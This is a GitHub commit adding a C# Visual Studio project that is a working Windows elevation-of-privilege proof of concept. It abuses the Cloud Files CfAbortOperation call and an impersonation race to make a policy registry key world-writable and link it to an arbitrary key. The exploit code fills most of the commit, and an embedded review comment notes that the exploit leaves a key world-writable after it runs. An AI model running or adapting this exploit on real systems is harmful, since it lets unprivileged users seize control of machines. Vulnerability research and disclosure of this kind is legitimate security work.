Add files via upload

Nightmare-Eclipse 2026-05-14 22:33:50 +02:00 committed by GitHub
parent 17a2a44ccf
commit b73f93814b
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
6 changed files with 397 additions and 0 deletions


@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30413.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoC_AbortHydration_ArbitraryRegKey_EoP", "PoC_AbortHydration_ArbitraryRegKey_EoP\PoC_AbortHydration_ArbitraryRegKey_EoP.csproj", "{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AC46CFC5-1E96-44EF-8DC8-8D76B107B781}
EndGlobalSection
EndGlobal


@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>


@ -0,0 +1,59 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
<AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
<HintPath>..\packages\NtApiDotNet.1.1.28\lib\net45\NtApiDotNet.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
<None Include="packages.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>


@ -0,0 +1,267 @@
using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Runtime.InteropServices;
using System.Threading;
namespace PoC_AbortHydration_ArbitraryRegKey_EoP
{
static class Program
{
static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
{
Console.WriteLine("Opening for {0}", desired_access);
using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
{
using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
{
if (key.IsSuccess)
return key.Result.Duplicate();
}
using (var imp = NtThread.Current.ImpersonateAnonymousToken())
{
return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
}
}
}
static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
{
var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
key.SetSecurityDescriptor(sd, info);
}
static void ForceKeyDeleteKey(NtKey root, string name)
{
Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
{
Console.WriteLine("Opened for WriteDac");
SetSecurityDescriptor(key, SecurityInformation.Dacl);
}
using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
{
Console.WriteLine("Opened for WriteOwner");
SetSecurityDescriptor(key, SecurityInformation.Label);
}
using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
{
Console.WriteLine("Opened for enumerate.");
DeleteRegistryTree(new_key);
new_key.Delete();
}
}
static void DeleteRegistryTree(NtKey root)
{
foreach (var name in root.QueryKeys())
{
ForceKeyDeleteKey(root, name);
}
}
[Flags]
enum AbortHydrationFlags
{
None = 0,
Unblock = 1,
Block = 2,
}
[DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
[StructLayout(LayoutKind.Sequential)]
struct CF_PLATFORM_INFO
{
public int BuildNumber;
public int RevisionNumber;
public int IntegrationNumber;
}
[DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
static extern int CfGetPlatformInfo(
out CF_PLATFORM_INFO PlatformVersion
);
static void ForceTokenThread(object obj)
{
try
{
using (var thread = (NtThread)obj)
{
Console.WriteLine("In force token thread {0}", thread);
using (var token = TokenUtils.GetAnonymousToken())
{
while (true)
{
thread.SetImpersonationToken(token);
thread.SetImpersonationToken(null);
}
}
}
}
catch(ThreadAbortException)
{
return;
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
const string TARGET_KEY = @"\Registry\User\.DEFAULT\DEMODEMO";
static void CheckKeyThread(object root_key)
{
string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
try
{
using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
{
while (true)
{
if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
{
Console.WriteLine("Change detected.");
Environment.Exit(0);
break;
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
static int Check(this int hr)
{
if (hr < 0)
Marshal.ThrowExceptionForHR(hr);
return hr;
}
const int MAX_STAGE = 4;
static void Stage0()
{
for (int i = 1; i < MAX_STAGE; ++i)
{
Win32ProcessConfig config = new Win32ProcessConfig
{
CommandLine = $"run {i}",
ApplicationName = typeof(Program).Assembly.Location,
TerminateOnDispose = true
};
using (var p = Win32Process.CreateProcess(config))
{
if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
{
throw new ArgumentException($"Failed to run stage {i}");
}
}
}
}
static void Stage1(bool root_key)
{
Thread check_key_th = new Thread(CheckKeyThread);
check_key_th.IsBackground = true;
check_key_th.Start(root_key);
Thread.Sleep(1000);
var th = NtThread.OpenCurrent();
var anon_thread = new Thread(ForceTokenThread)
{
IsBackground = true
};
anon_thread.Start(th);
while (true)
{
CfAbortOperation(NtProcess.Current.ProcessId,
IntPtr.Zero, AbortHydrationFlags.Block);
}
}
static void Stage2()
{
using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
{
SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
DeleteRegistryTree(key);
}
NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
Stage1(false);
}
static void Stage3()
{
using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
{
Console.WriteLine("Cleaning up link {0}", key.FullPath);
key.Delete();
}
using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
{
SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
}
}
static void Main(string[] args)
{
try
{
CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
if (args.Length <= 1)
{
int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
switch (stage)
{
case 0:
Stage0();
break;
case 1:
Stage1(true);
break;
case 2:
Stage2();
break;
case 3:
Stage3();
break;
default:
throw new ArgumentException("Erm?");
}
}
else
{
using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
{
using (var imp = token.Impersonate())
{
CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
}
}
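Review bot: Stage3 only deletes the BlockedApps link and re-ACLs TARGET_KEY; it never touches the CloudFiles key that Stage2 opened for WriteDac|WriteOwner and re-ACLed through SetSecurityDescriptor with the hard-coded SDDL (GENERIC_ALL for Everyone and Anonymous, inheritable, plus an S-1-16-0 label), so after the PoC finishes the policy key under HKU\.DEFAULT\Software\Policies\Microsoft stays world-writable on the test machine, and Stage2 deletes only its subtree, not the key itself. Stage0 throws as soon as a child exceeds its `Wait(10)` timeout and has no finally, so a lost race in stage 2 also leaves the BlockedApps → DEMODEMO symbolic link in place with no cleanup pass at all. I would wrap the stage loop in Stage0 in try/finally that runs the stage-3 cleanup regardless of outcome, and have Stage3 additionally reopen CLOUD_FILES and delete it or reapply a non-permissive DACL (the original descriptor is never captured, so whether the key pre-existed would have to be recorded by Stage2 first). Separately, the else-branch of Main takes the logon password as plaintext `args[1]` for GetLogonUserToken; reading it from the console or an environment variable would keep it out of process listings and shell history.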


@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("PoC_AbortHydration_ArbitraryRegKey_EoP")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("PoC_AbortHydration_ArbitraryRegKey_EoP")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("352f6dd7-9b05-4896-9e7d-2efa36eac6e3")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="NtApiDotNet" version="1.1.28" targetFramework="net472" />
</packages>